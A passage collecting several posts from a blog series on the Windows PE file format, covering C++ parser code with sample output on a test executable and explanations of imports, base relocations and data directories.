PrintSectionHeadersInfo()

This function loops over the Section Headers array (filled by ParseSectionHeaders()), and it prints information about each section.

void PE64FILE::PrintSectionHeadersInfo() {
	
	printf(" SECTION HEADERS:\n");
	printf(" ----------------\n\n");

	for (int i = 0; i < PEFILE_NT_HEADERS_FILE_HEADER_NUMBER0F_SECTIONS; i++) {
		printf("   * %.8s:\n", PEFILE_SECTION_HEADERS[i].Name);
		printf("        VirtualAddress: 0x%X\n", PEFILE_SECTION_HEADERS[i].VirtualAddress);
		printf("        VirtualSize: 0x%X\n", PEFILE_SECTION_HEADERS[i].Misc.VirtualSize);
		printf("        PointerToRawData: 0x%X\n", PEFILE_SECTION_HEADERS[i].PointerToRawData);
		printf("        SizeOfRawData: 0x%X\n", PEFILE_SECTION_HEADERS[i].SizeOfRawData);
		printf("        Characteristics: 0x%X\n\n", PEFILE_SECTION_HEADERS[i].Characteristics);
	}

}


Parsing Imports

ParseImportDirectory()

To parse out the Import Directory Table we need to determine the count of IMAGE_IMPORT_DESCRIPTORs first.

This function starts by resolving the file offset of the Import Directory, then it goes into a loop where in each loop it keeps reading the next import descriptor.
In each iteration it checks if the descriptor has zeroed out values, if that is the case then we’ve reached the end of the Import Directory, so it breaks.
Otherwise it increments _import_directory_count and the loop continues.

After finding the size of the Import Directory, the function assigns the PEFILE_IMPORT_TABLE class member to a pointer to an IMAGE_IMPORT_DESCRIPTOR array of the count of _import_directory_count then goes into another loop similar to the one we’ve seen in ParseSectionHeaders() to parse out the import descriptors.

void PE64FILE::ParseImportDirectory() {
	
	DWORD _import_directory_address = resolve(PEFILE_IMPORT_DIRECTORY.VirtualAddress, locate(PEFILE_IMPORT_DIRECTORY.VirtualAddress));
	_import_directory_count = 0;

	while (true) {
		___IMAGE_IMPORT_DESCRIPTOR tmp;
		int offset = (_import_directory_count * sizeof(___IMAGE_IMPORT_DESCRIPTOR)) + _import_directory_address;
		fseek(Ppefile, offset, SEEK_SET);
		fread(&tmp, sizeof(___IMAGE_IMPORT_DESCRIPTOR), 1, Ppefile);

		if (tmp.Name == 0x00000000 && tmp.FirstThunk == 0x00000000) {
			_import_directory_count -= 1;
			_import_directory_size = _import_directory_count * sizeof(___IMAGE_IMPORT_DESCRIPTOR);
			break;
		}

		_import_directory_count++;
	}

	PEFILE_IMPORT_TABLE = new ___IMAGE_IMPORT_DESCRIPTOR[_import_directory_count];

	for (int i = 0; i < _import_directory_count; i++) {
		int offset = (i * sizeof(___IMAGE_IMPORT_DESCRIPTOR)) + _import_directory_address;
		fseek(Ppefile, offset, SEEK_SET);
		fread(&PEFILE_IMPORT_TABLE[i], sizeof(___IMAGE_IMPORT_DESCRIPTOR), 1, Ppefile);
	}

}

PrintImportTableInfo()

After obtaining the import descriptors, further parsing is needed to retrieve information about the imported functions.
This is done by the PrintImportTableInfo() function.

This function iterates over the import descriptors, and for each descriptor it resolves the file offset of the DLL name, retrieves the DLL name then prints it, it also prints the ILT RVA, the IAT RVA and whether the import is bound or not.

After that it resolves the file offset of the ILT then it parses out each ILT entry.
If the Ordinal/Name flag is set it prints the function ordinal, otherwise it prints the function name, the hint RVA and the hint.

If the ILT entry is zeroed out, the loop breaks and the next import descriptor parsing iteration starts.

We’ve discussed the details about this in the PE imports post.

void PE64FILE::PrintImportTableInfo() {
	
	printf(" IMPORT TABLE:\n");
	printf(" ----------------\n\n");

	for (int i = 0; i < _import_directory_count; i++) {
		DWORD NameAddr = resolve(PEFILE_IMPORT_TABLE[i].Name, locate(PEFILE_IMPORT_TABLE[i].Name));
		int NameSize = 0;

		while (true) {
			char tmp;
			fseek(Ppefile, (NameAddr + NameSize), SEEK_SET);
			fread(&tmp, sizeof(char), 1, Ppefile);

			if (tmp == 0x00) {
				break;
			}

			NameSize++;
		}

		char* Name = new char[NameSize + 2];
		fseek(Ppefile, NameAddr, SEEK_SET);
		fread(Name, (NameSize * sizeof(char)) + 1, 1, Ppefile);
		printf("   * %s:\n", Name);
		delete[] Name;

		printf("       ILT RVA: 0x%X\n", PEFILE_IMPORT_TABLE[i].DUMMYUNIONNAME.OriginalFirstThunk);
		printf("       IAT RVA: 0x%X\n", PEFILE_IMPORT_TABLE[i].FirstThunk);

		if (PEFILE_IMPORT_TABLE[i].TimeDateStamp == 0) {
			printf("       Bound: FALSE\n");
		}
		else if (PEFILE_IMPORT_TABLE[i].TimeDateStamp == -1) {
			printf("       Bound: TRUE\n");
		}

		printf("\n");

		DWORD ILTAddr = resolve(PEFILE_IMPORT_TABLE[i].DUMMYUNIONNAME.OriginalFirstThunk, locate(PEFILE_IMPORT_TABLE[i].DUMMYUNIONNAME.OriginalFirstThunk));
		int entrycounter = 0;

		while (true) {

			ILT_ENTRY_64 entry;

			fseek(Ppefile, (ILTAddr + (entrycounter * sizeof(QWORD))), SEEK_SET);
			fread(&entry, sizeof(ILT_ENTRY_64), 1, Ppefile);

			BYTE flag = entry.ORDINAL_NAME_FLAG;
			DWORD HintRVA = 0x0;
			WORD ordinal = 0x0;

			if (flag == 0x0) {
				HintRVA = entry.FIELD_2.HINT_NAME_TABE;
			}
			else if (flag == 0x01) {
				ordinal = entry.FIELD_2.ORDINAL;
			}

			if (flag == 0x0 && HintRVA == 0x0 && ordinal == 0x0) {
				break;
			}

			printf("\n       Entry:\n");

			if (flag == 0x0) {
				___IMAGE_IMPORT_BY_NAME hint;

				DWORD HintAddr = resolve(HintRVA, locate(HintRVA));
				fseek(Ppefile, HintAddr, SEEK_SET);
				fread(&hint, sizeof(___IMAGE_IMPORT_BY_NAME), 1, Ppefile);
				printf("         Name: %s\n", hint.Name);
				printf("         Hint RVA: 0x%X\n", HintRVA);
				printf("         Hint: 0x%X\n", hint.Hint);
			}
			else if (flag == 1) {
				printf("         Ordinal: 0x%X\n", ordinal);
			}

			entrycounter++;
		}

		printf("\n   ----------------------\n\n");

	}

}


Parsing Base Relocations

ParseBaseReloc()

This function follows the same process we’ve seen in ParseImportDirectory().
It resolves the file offset of the Base Relocation Directory, then it loops over each relocation block until it reaches a zeroed out block. Then it parses out these blocks and saves each IMAGE_BASE_RELOCATION structure in PEFILE_BASERELOC_TABLE.
One thing to note here that is different from what we’ve seen in ParseImportDirectory() is that in addition to keeping a block counter we also keep a size counter that’s incremented by adding the value of SizeOfBlock of each block in each iteration.
We do this because relocation blocks don’t have a fixed size, and in order to correctly calculate the offset of the next relocation block we need the total size of the previous blocks.

void PE64FILE::ParseBaseReloc() {
	
	DWORD _basereloc_directory_address = resolve(PEFILE_BASERELOC_DIRECTORY.VirtualAddress, locate(PEFILE_BASERELOC_DIRECTORY.VirtualAddress));
	_basreloc_directory_count = 0;
	int _basereloc_size_counter = 0;

	while (true) {
		___IMAGE_BASE_RELOCATION tmp;

		int offset = (_basereloc_size_counter + _basereloc_directory_address);

		fseek(Ppefile, offset, SEEK_SET);
		fread(&tmp, sizeof(___IMAGE_BASE_RELOCATION), 1, Ppefile);

		if (tmp.VirtualAddress == 0x00000000 &&
			tmp.SizeOfBlock == 0x00000000) {
			break;
		}

		_basreloc_directory_count++;
		_basereloc_size_counter += tmp.SizeOfBlock;
	}

	PEFILE_BASERELOC_TABLE = new ___IMAGE_BASE_RELOCATION[_basreloc_directory_count];

	_basereloc_size_counter = 0;

	for (int i = 0; i < _basreloc_directory_count; i++) {
		int offset = _basereloc_directory_address + _basereloc_size_counter;
		fseek(Ppefile, offset, SEEK_SET);
		fread(&PEFILE_BASERELOC_TABLE[i], sizeof(___IMAGE_BASE_RELOCATION), 1, Ppefile);
		_basereloc_size_counter += PEFILE_BASERELOC_TABLE[i].SizeOfBlock;
	}

}

PrintBaseRelocationInfo()

This function iterates over the base relocation blocks, and for each block it resolves the file offset of the block, then it prints the block RVA, size and number of entries (calculated by subtracting the size of IMAGE_BASE_RELOCATION from the block size then dividing that by the size of a WORD).
After that it iterates over the relocation entries and prints the relocation value, and from that value it separates the type and the offset and prints each one of them.

We’ve discussed the details about this in the PE base relocations post.

void PE64FILE::PrintBaseRelocationsInfo() {
	
	printf(" BASE RELOCATIONS TABLE:\n");
	printf(" -----------------------\n");

	int szCounter = sizeof(___IMAGE_BASE_RELOCATION);

	for (int i = 0; i < _basreloc_directory_count; i++) {

		DWORD PAGERVA, BLOCKSIZE, BASE_RELOC_ADDR;
		int ENTRIES;

		BASE_RELOC_ADDR = resolve(PEFILE_BASERELOC_DIRECTORY.VirtualAddress, locate(PEFILE_BASERELOC_DIRECTORY.VirtualAddress));
		PAGERVA = PEFILE_BASERELOC_TABLE[i].VirtualAddress;
		BLOCKSIZE = PEFILE_BASERELOC_TABLE[i].SizeOfBlock;
		ENTRIES = (BLOCKSIZE - sizeof(___IMAGE_BASE_RELOCATION)) / sizeof(WORD);

		printf("\n   Block 0x%X: \n", i);
		printf("     Page RVA: 0x%X\n", PAGERVA);
		printf("     Block size: 0x%X\n", BLOCKSIZE);
		printf("     Number of entries: 0x%X\n", ENTRIES);
		printf("\n     Entries:\n");

		for (int i = 0; i < ENTRIES; i++) {

			BASE_RELOC_ENTRY entry;

			int offset = (BASE_RELOC_ADDR + szCounter + (i * sizeof(WORD)));

			fseek(Ppefile, offset, SEEK_SET);
			fread(&entry, sizeof(WORD), 1, Ppefile);

			printf("\n       * Value: 0x%X\n", entry);
			printf("         Relocation Type: 0x%X\n", entry.TYPE);
			printf("         Offset: 0x%X\n", entry.OFFSET);

		}
		printf("\n   ----------------------\n\n");
		szCounter += BLOCKSIZE;
	}

}


Conclusion

Here’s the full output after running the parser on a file:

Desktop>.\PE-Parser.exe .\SimpleApp64.exe


 FILE: .\SimpleApp64.exe
 TYPE: 0x20B (PE32+)

 ----------------------------------

 DOS HEADER:
 -----------

 Magic: 0x5A4D
 File address of new exe header: 0x100

 ----------------------------------

 RICH HEADER:
 ------------

 0x7809 0x93 0xA: 30729.147.10
 0x6FCB 0x101 0x2: 28619.257.2
 0x6FCB 0x105 0x11: 28619.261.17
 0x6FCB 0x104 0xA: 28619.260.10
 0x6FCB 0x103 0x3: 28619.259.3
 0x685B 0x101 0x5: 26715.257.5
 0x0 0x1 0x30: 0.1.48
 0x7086 0x109 0x1: 28806.265.1
 0x7086 0xFF 0x1: 28806.255.1
 0x7086 0x102 0x1: 28806.258.1

 ----------------------------------

 NT HEADERS:
 -----------

 PE Signature: 0x4550

 File Header:

   Machine: 0x8664
   Number of sections: 0x6
   Size of optional header: 0xF0

 Optional Header:

   Magic: 0x20B
   Size of code section: 0xE00
   Size of initialized data: 0x1E00
   Size of uninitialized data: 0x0
   Address of entry point: 0x12C4
   RVA of start of code section: 0x1000
   Desired image base: 0x40000000
   Section alignment: 0x1000
   File alignment: 0x200
   Size of image: 0x7000
   Size of headers: 0x400

 Data Directories:

   * Export Directory:
       RVA: 0x0
       Size: 0x0

   * Import Directory:
       RVA: 0x27AC
       Size: 0xB4

   * Resource Directory:
       RVA: 0x5000
       Size: 0x1E0

   * Exception Directory:
       RVA: 0x4000
       Size: 0x168

   * Security Directory:
       RVA: 0x0
       Size: 0x0

   * Base Relocation Table:
       RVA: 0x6000
       Size: 0x28

   * Debug Directory:
       RVA: 0x2248
       Size: 0x70

   * Architecture Specific Data:
       RVA: 0x0
       Size: 0x0

   * RVA of GlobalPtr:
       RVA: 0x0
       Size: 0x0

   * TLS Directory:
       RVA: 0x0
       Size: 0x0

   * Load Configuration Directory:
       RVA: 0x22C0
       Size: 0x130

   * Bound Import Directory:
       RVA: 0x0
       Size: 0x0

   * Import Address Table:
       RVA: 0x2000
       Size: 0x198

   * Delay Load Import Descriptors:
       RVA: 0x0
       Size: 0x0

   * COM Runtime Descriptor:
       RVA: 0x0
       Size: 0x0

 ----------------------------------

 SECTION HEADERS:
 ----------------

   * .text:
        VirtualAddress: 0x1000
        VirtualSize: 0xD2C
        PointerToRawData: 0x400
        SizeOfRawData: 0xE00
        Characteristics: 0x60000020

   * .rdata:
        VirtualAddress: 0x2000
        VirtualSize: 0xE3C
        PointerToRawData: 0x1200
        SizeOfRawData: 0x1000
        Characteristics: 0x40000040

   * .data:
        VirtualAddress: 0x3000
        VirtualSize: 0x638
        PointerToRawData: 0x2200
        SizeOfRawData: 0x200
        Characteristics: 0xC0000040

   * .pdata:
        VirtualAddress: 0x4000
        VirtualSize: 0x168
        PointerToRawData: 0x2400
        SizeOfRawData: 0x200
        Characteristics: 0x40000040

   * .rsrc:
        VirtualAddress: 0x5000
        VirtualSize: 0x1E0
        PointerToRawData: 0x2600
        SizeOfRawData: 0x200
        Characteristics: 0x40000040

   * .reloc:
        VirtualAddress: 0x6000
        VirtualSize: 0x28
        PointerToRawData: 0x2800
        SizeOfRawData: 0x200
        Characteristics: 0x42000040


 ----------------------------------

 IMPORT TABLE:
 ----------------

   * USER32.dll:
       ILT RVA: 0x28E0
       IAT RVA: 0x2080
       Bound: FALSE


       Entry:
         Name: MessageBoxA
         Hint RVA: 0x29F8
         Hint: 0x283

   ----------------------

   * VCRUNTIME140.dll:
       ILT RVA: 0x28F0
       IAT RVA: 0x2090
       Bound: FALSE


       Entry:
         Name: memset
         Hint RVA: 0x2A5E
         Hint: 0x3E

       Entry:
         Name: __current_exception_context
         Hint RVA: 0x2A40
         Hint: 0x1C

       Entry:
         Name: __current_exception
         Hint RVA: 0x2A2A
         Hint: 0x1B

       Entry:
         Name: __C_specific_handler
         Hint RVA: 0x2A12
         Hint: 0x8

   ----------------------

   * api-ms-win-crt-runtime-l1-1-0.dll:
       ILT RVA: 0x2948
       IAT RVA: 0x20E8
       Bound: FALSE


       Entry:
         Name: _crt_atexit
         Hint RVA: 0x2C12
         Hint: 0x1E

       Entry:
         Name: terminate
         Hint RVA: 0x2C20
         Hint: 0x67

       Entry:
         Name: _exit
         Hint RVA: 0x2B30
         Hint: 0x23

       Entry:
         Name: _register_thread_local_exe_atexit_callback
         Hint RVA: 0x2B76
         Hint: 0x3D

       Entry:
         Name: _c_exit
         Hint RVA: 0x2B6C
         Hint: 0x15

       Entry:
         Name: exit
         Hint RVA: 0x2B28
         Hint: 0x55

       Entry:
         Name: _initterm_e
         Hint RVA: 0x2B1A
         Hint: 0x37

       Entry:
         Name: _initterm
         Hint RVA: 0x2B0E
         Hint: 0x36

       Entry:
         Name: _get_initial_narrow_environment
         Hint RVA: 0x2AEC
         Hint: 0x28

       Entry:
         Name: _initialize_narrow_environment
         Hint RVA: 0x2ACA
         Hint: 0x33

       Entry:
         Name: _configure_narrow_argv
         Hint RVA: 0x2AB0
         Hint: 0x18

       Entry:
         Name: _initialize_onexit_table
         Hint RVA: 0x2BDA
         Hint: 0x34

       Entry:
         Name: _set_app_type
         Hint RVA: 0x2A8C
         Hint: 0x42

       Entry:
         Name: _seh_filter_exe
         Hint RVA: 0x2A7A
         Hint: 0x40

       Entry:
         Name: _cexit
         Hint RVA: 0x2B62
         Hint: 0x16

       Entry:
         Name: __p___argv
         Hint RVA: 0x2B54
         Hint: 0x5

       Entry:
         Name: __p___argc
         Hint RVA: 0x2B46
         Hint: 0x4

       Entry:
         Name: _register_onexit_function
         Hint RVA: 0x2BF6
         Hint: 0x3C

   ----------------------

   * api-ms-win-crt-math-l1-1-0.dll:
       ILT RVA: 0x2938
       IAT RVA: 0x20D8
       Bound: FALSE


       Entry:
         Name: __setusermatherr
         Hint RVA: 0x2A9C
         Hint: 0x9

   ----------------------

   * api-ms-win-crt-stdio-l1-1-0.dll:
       ILT RVA: 0x29E0
       IAT RVA: 0x2180
       Bound: FALSE


       Entry:
         Name: __p__commode
         Hint RVA: 0x2BCA
         Hint: 0x1

       Entry:
         Name: _set_fmode
         Hint RVA: 0x2B38
         Hint: 0x54

   ----------------------

   * api-ms-win-crt-locale-l1-1-0.dll:
       ILT RVA: 0x2928
       IAT RVA: 0x20C8
       Bound: FALSE


       Entry:
         Name: _configthreadlocale
         Hint RVA: 0x2BA4
         Hint: 0x8

   ----------------------

   * api-ms-win-crt-heap-l1-1-0.dll:
       ILT RVA: 0x2918
       IAT RVA: 0x20B8
       Bound: FALSE


       Entry:
         Name: _set_new_mode
         Hint RVA: 0x2BBA
         Hint: 0x16

   ----------------------


 ----------------------------------

 BASE RELOCATIONS TABLE:
 -----------------------

   Block 0x0:
     Page RVA: 0x2000
     Block size: 0x28
     Number of entries: 0x10

     Entries:

       * Value: 0xA198
         Relocation Type: 0xA
         Offset: 0x198

       * Value: 0xA1A0
         Relocation Type: 0xA
         Offset: 0x1A0

       * Value: 0xA1A8
         Relocation Type: 0xA
         Offset: 0x1A8

       * Value: 0xA1B0
         Relocation Type: 0xA
         Offset: 0x1B0

       * Value: 0xA1B8
         Relocation Type: 0xA
         Offset: 0x1B8

       * Value: 0xA1C8
         Relocation Type: 0xA
         Offset: 0x1C8

       * Value: 0xA1E0
         Relocation Type: 0xA
         Offset: 0x1E0

       * Value: 0xA1E8
         Relocation Type: 0xA
         Offset: 0x1E8

       * Value: 0xA220
         Relocation Type: 0xA
         Offset: 0x220

       * Value: 0xA228
         Relocation Type: 0xA
         Offset: 0x228

       * Value: 0xA318
         Relocation Type: 0xA
         Offset: 0x318

       * Value: 0xA330
         Relocation Type: 0xA
         Offset: 0x330

       * Value: 0xA338
         Relocation Type: 0xA
         Offset: 0x338

       * Value: 0xA3D8
         Relocation Type: 0xA
         Offset: 0x3D8

       * Value: 0xA3E0
         Relocation Type: 0xA
         Offset: 0x3E0

       * Value: 0xA3E8
         Relocation Type: 0xA
         Offset: 0x3E8

   ----------------------


 ----------------------------------

I hope that seeing actual code has given you a better understanding of what we’ve discussed throughout the previous posts.
I believe that there are better ways for implementation than the ones I have presented, I’m in no way a c++ programmer and I know that there’s always room for improvement, so feel free to reach out to me, any feedback would be much appreciated.

Thanks for reading.

A dive into the PE file format - PE file structure - Part 6: PE Base Relocations

By: 0xRick
28 October 2021 at 15:00

A dive into the PE file format - PE file structure - Part 6: PE Base Relocations

Introduction

In this post we’re going to talk about PE base relocations. We’re going to discuss what relocations are, then we’ll take a look at the relocation table.


Relocations

When a program is compiled, the compiler assumes that the executable is going to be loaded at a certain base address, that address is saved in IMAGE_OPTIONAL_HEADER.ImageBase, some addresses get calculated then hardcoded within the executable based on the base address.
However for a variety of reasons, it’s not very likely that the executable is going to get its desired base address, it will get loaded in another base address and that will make all of the hardcoded addresses invalid.
A list of all hardcoded values that will need fixing if the image is loaded at a different base address is saved in a special table called the Relocation Table (a Data Directory within the .reloc section). The process of relocating (done by the loader) is what fixes these values.

Let’s take an example, the following code defines an int variable and a pointer to that variable:

int test = 2;
int* testPtr = &test;

During compile-time, the compiler will assume a base address, let’s say it assumes a base address of 0x1000, it decides that test will be located at an offset of 0x100 and based on that it gives testPtr a value of 0x1100.
Later on, a user runs the program and the image gets loaded into memory.
It gets a base address of 0x2000, this means that the hardcoded value of testPtr will be invalid, the loader fixes that value by adding the difference between the assumed base address and the actual base address, in this case it’s a difference of 0x1000 (0x2000 - 0x1000), so the new value of testPtr will be 0x2100 (0x1100 + 0x1000) which is the correct new address of test.


Relocation Table

As described by Microsoft documentation, the base relocation table contains entries for all base relocations in the image.

It’s a Data Directory located within the .reloc section, it’s divided into blocks, each block represents the base relocations for a 4K page and each block must start on a 32-bit boundary.

Each block starts with an IMAGE_BASE_RELOCATION structure followed by any number of offset field entries.

The IMAGE_BASE_RELOCATION structure specifies the page RVA, and the size of the relocation block.

typedef struct _IMAGE_BASE_RELOCATION {
    DWORD   VirtualAddress;
    DWORD   SizeOfBlock;
} IMAGE_BASE_RELOCATION;
typedef IMAGE_BASE_RELOCATION UNALIGNED * PIMAGE_BASE_RELOCATION;

Each offset field entry is a WORD, first 4 bits of it define the relocation type (check Microsoft documentation for a list of relocation types), the last 12 bits store an offset from the RVA specified in the IMAGE_BASE_RELOCATION structure at the start of the relocation block.

Each relocation entry gets processed by adding the RVA of the page to the image base address, then by adding the offset specified in the relocation entry, an absolute address of the location that needs fixing can be obtained.

The PE file I’m looking at contains only one relocation block, its size is 0x28 bytes:

We know that each block starts with an 8-byte-long structure, meaning that the size of the entries is 0x20 bytes (32 bytes), each entry’s size is 2 bytes so the total number of entries should be 16.


Conclusion

That’s all.
Thanks for reading.

A dive into the PE file format - PE file structure - Part 5: PE Imports (Import Directory Table, ILT, IAT)

By: 0xRick
28 October 2021 at 01:00

A dive into the PE file format - PE file structure - Part 5: PE Imports (Import Directory Table, ILT, IAT)

Introduction

In this post we’re going to talk about a very important aspect of PE files, the PE imports. To understand how PE files handle their imports, we’ll go over some of the Data Directories present in the Import Data section (.idata), the Import Directory Table, the Import Lookup Table (ILT) or also referred to as the Import Name Table (INT) and the Import Address Table (IAT).


Import Directory Table

The Import Directory Table is a Data Directory located at the beginning of the .idata section.

It consists of an array of IMAGE_IMPORT_DESCRIPTOR structures, each one of them is for a DLL.
It doesn’t have a fixed size, so the last IMAGE_IMPORT_DESCRIPTOR of the array is zeroed-out (NULL-Padded) to indicate the end of the Import Directory Table.

IMAGE_IMPORT_DESCRIPTOR is defined as follows:

typedef struct _IMAGE_IMPORT_DESCRIPTOR {
    union {
        DWORD   Characteristics;
        DWORD   OriginalFirstThunk;
    } DUMMYUNIONNAME;
    DWORD   TimeDateStamp;
    DWORD   ForwarderChain;
    DWORD   Name;
    DWORD   FirstThunk;
} IMAGE_IMPORT_DESCRIPTOR;
typedef IMAGE_IMPORT_DESCRIPTOR UNALIGNED *PIMAGE_IMPORT_DESCRIPTOR;
  • OriginalFirstThunk: RVA of the ILT.
  • TimeDateStamp: A time date stamp, that’s initially set to 0 if not bound and set to -1 if bound.
    In case of an unbound import the time date stamp gets updated to the time date stamp of the DLL after the image is bound.
    In case of a bound import it stays set to -1 and the real time date stamp of the DLL can be found in the Bound Import Directory Table in the corresponding IMAGE_BOUND_IMPORT_DESCRIPTOR .
    We’ll discuss bound imports in the next section.
  • ForwarderChain: The index of the first forwarder chain reference.
    This is something responsible for DLL forwarding. (DLL forwarding is when a DLL forwards some of its exported functions to another DLL.)
  • Name: An RVA of an ASCII string that contains the name of the imported DLL.
  • FirstThunk: RVA of the IAT.

Bound Imports

A bound import essentially means that the import table contains fixed addresses for the imported functions.
These addresses are calculated and written during compile time by the linker.

Using bound imports is a speed optimization, it reduces the time needed by the loader to resolve function addresses and fill the IAT, however if at run-time the bound addresses do not match the real ones then the loader will have to resolve these addresses again and fix the IAT.

When discussing IMAGE_IMPORT_DESCRIPTOR.TimeDateStamp, I mentioned that in case of a bound import, the time date stamp is set to -1 and the real time date stamp of the DLL can be found in the corresponding IMAGE_BOUND_IMPORT_DESCRIPTOR in the Bound Import Data Directory.

Bound Import Data Directory

The Bound Import Data Directory is similar to the Import Directory Table, however as the name suggests, it holds information about the bound imports.

It consists of an array of IMAGE_BOUND_IMPORT_DESCRIPTOR structures, and ends with a zeroed-out IMAGE_BOUND_IMPORT_DESCRIPTOR.

IMAGE_BOUND_IMPORT_DESCRIPTOR is defined as follows:

typedef struct _IMAGE_BOUND_IMPORT_DESCRIPTOR {
    DWORD   TimeDateStamp;
    WORD    OffsetModuleName;
    WORD    NumberOfModuleForwarderRefs;
// Array of zero or more IMAGE_BOUND_FORWARDER_REF follows
} IMAGE_BOUND_IMPORT_DESCRIPTOR,  *PIMAGE_BOUND_IMPORT_DESCRIPTOR;
  • TimeDateStamp: The time date stamp of the imported DLL.
  • OffsetModuleName: An offset to a string with the name of the imported DLL.
    It’s an offset from the first IMAGE_BOUND_IMPORT_DESCRIPTOR
  • NumberOfModuleForwarderRefs: The number of the IMAGE_BOUND_FORWARDER_REF structures that immediately follow this structure.
    IMAGE_BOUND_FORWARDER_REF is a structure that’s identical to IMAGE_BOUND_IMPORT_DESCRIPTOR, the only difference is that the last member is reserved.

That’s all we need to know about bound imports.


Import Lookup Table (ILT)

Sometimes people refer to it as the Import Name Table (INT).

Every imported DLL has an Import Lookup Table.
IMAGE_IMPORT_DESCRIPTOR.OriginalFirstThunk holds the RVA of the ILT of the corresponding DLL.

The ILT is essentially a table of names or references, it tells the loader which functions are needed from the imported DLL.

The ILT consists of an array of 32-bit numbers (for PE32) or 64-bit numbers for (PE32+), the last one is zeroed-out to indicate the end of the ILT.

Each entry of these entries encodes information as follows:

  • Bit 31/63 (most significant bit): This is called the Ordinal/Name flag, it specifies whether to import the function by name or by ordinal.
  • Bits 15-0: If the Ordinal/Name flag is set to 1 these bits are used to hold the 16-bit ordinal number that will be used to import the function, bits 30-15/62-15 for PE32/PE32+ must be set to 0.
  • Bits 30-0: If the Ordinal/Name flag is set to 0 these bits are used to hold an RVA of a Hint/Name table.

Hint/Name Table

A Hint/Name table is a structure defined in winnt.h as IMAGE_IMPORT_BY_NAME:

typedef struct _IMAGE_IMPORT_BY_NAME {
    WORD    Hint;
    CHAR   Name[1];
} IMAGE_IMPORT_BY_NAME, *PIMAGE_IMPORT_BY_NAME;
  • Hint: A word that contains a number, this number is used to look-up the function, that number is first used as an index into the export name pointer table, if that initial check fails a binary search is performed on the DLL’s export name pointer table.
  • Name: A null-terminated string that contains the name of the function to import.

Import Address Table (IAT)

On disk, the IAT is identical to the ILT, however during bounding when the binary is being loaded into memory, the entries of the IAT get overwritten with the addresses of the functions that are being imported.


Summary

So to summarize what we discussed in this post, for every DLL the executable is loading functions from, there will be an IMAGE_IMPORT_DESCRIPTOR within the Image Directory Table.
The IMAGE_IMPORT_DESCRIPTOR will contain the name of the DLL, and two fields holding RVAs of the ILT and the IAT.
The ILT will contain references for all the functions that are being imported from the DLL.
The IAT will be identical to the ILT until the executable is loaded in memory, then the loader will fill the IAT with the actual addresses of the imported functions.
If the DLL import is a bound import, then the import information will be contained in IMAGE_BOUND_IMPORT_DESCRIPTOR structures in a separate Data Directory called the Bound Import Data Directory.

Let’s take a quick look at the import information inside of an actual PE file.

Here’s the Import Directory Table of the executable:

All of these entries are IMAGE_IMPORT_DESCRIPTORs.

As you can see, the TimeDateStamp of all the imports is set to 0, meaning that none of these imports are bound, this is also confirmed in the Bound? column added by PE-bear.

For example, if we take USER32.dll and follow the RVA of its ILT (referenced by OriginalFirstThunk), we’ll find only 1 entry (because only one function is imported), and that entry looks like this:

This is a 64-bit executable, so the entry is 64 bits long.
As you can see, the last byte is set to 0, indicating that a Hint/Table name should be used to look-up the function.
We know that the RVA of this Hint/Table name should be referenced by the first 2 bytes, so we should follow RVA 0x29F8:

Now we’re looking at an IMAGE_IMPORT_BY_NAME structure, first two bytes hold the hint, which in this case is 0x283, the rest of the structure holds the full name of the function which is MessageBoxA.
We can verify that our interpretation of the data is correct by looking at how PE-bear parsed it, and we’ll see the same results:


Conclusion

That’s all I have to say about PE imports, in the next post I’ll discuss PE base relocations.
Thanks for reading.

A dive into the PE file format - PE file structure - Part 4: Data Directories, Section Headers and Sections

By: 0xRick
27 October 2021 at 01:00

A dive into the PE file format - PE file structure - Part 4: Data Directories, Section Headers and Sections

Introduction

In the last post we talked about the NT Headers and we skipped the last part of the Optional Header which was the data directories.

In this post we’re going to talk about what data directories are and where they are located.
We’re also going to cover section headers and sections in this post.


Data Directories

The last member of the IMAGE_OPTIONAL_HEADER structure was an array of IMAGE_DATA_DIRECTORY structures defined as follows:

IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];

IMAGE_NUMBEROF_DIRECTORY_ENTRIES is a constant defined with the value 16, meaning that this array can have up to 16 IMAGE_DATA_DIRECTORY entries:

#define IMAGE_NUMBEROF_DIRECTORY_ENTRIES    16

An IMAGE_DATA_DIRETORY structure is defines as follows:

typedef struct _IMAGE_DATA_DIRECTORY {
    DWORD   VirtualAddress;
    DWORD   Size;
} IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY;

It’s a very simple structure with only two members, first one being an RVA pointing to the start of the Data Directory and the second one being the size of the Data Directory.

So what is a Data Directory? Basically a Data Directory is a piece of data located within one of the sections of the PE file.
Data Directories contain useful information needed by the loader, an example of a very important directory is the Import Directory which contains a list of external functions imported from other libraries, we’ll discuss it in more detail when we go over PE imports.

Please note that not all Data Directories have the same structure, the IMAGE_DATA_DIRECTORY.VirtualAddress points to the Data Directory, however the type of that directory is what determines how that chunk of data is going to be parsed.

Here’s a list of Data Directories defined in winnt.h. (Each one of these values represents an index in the DataDirectory array):

// Directory Entries

#define IMAGE_DIRECTORY_ENTRY_EXPORT          0   // Export Directory
#define IMAGE_DIRECTORY_ENTRY_IMPORT          1   // Import Directory
#define IMAGE_DIRECTORY_ENTRY_RESOURCE        2   // Resource Directory
#define IMAGE_DIRECTORY_ENTRY_EXCEPTION       3   // Exception Directory
#define IMAGE_DIRECTORY_ENTRY_SECURITY        4   // Security Directory
#define IMAGE_DIRECTORY_ENTRY_BASERELOC       5   // Base Relocation Table
#define IMAGE_DIRECTORY_ENTRY_DEBUG           6   // Debug Directory
//      IMAGE_DIRECTORY_ENTRY_COPYRIGHT       7   // (X86 usage)
#define IMAGE_DIRECTORY_ENTRY_ARCHITECTURE    7   // Architecture Specific Data
#define IMAGE_DIRECTORY_ENTRY_GLOBALPTR       8   // RVA of GP
#define IMAGE_DIRECTORY_ENTRY_TLS             9   // TLS Directory
#define IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    10   // Load Configuration Directory
#define IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   11   // Bound Import Directory in headers
#define IMAGE_DIRECTORY_ENTRY_IAT            12   // Import Address Table
#define IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   13   // Delay Load Import Descriptors
#define IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR 14   // COM Runtime descriptor

If we take a look at the contents of IMAGE_OPTIONAL_HEADER.DataDirectory of an actual PE file, we might see entries where both fields are set to 0:

This means that this specific Data Directory is not used (doesn’t exist) in the executable file.


Sections and Section Headers

Sections

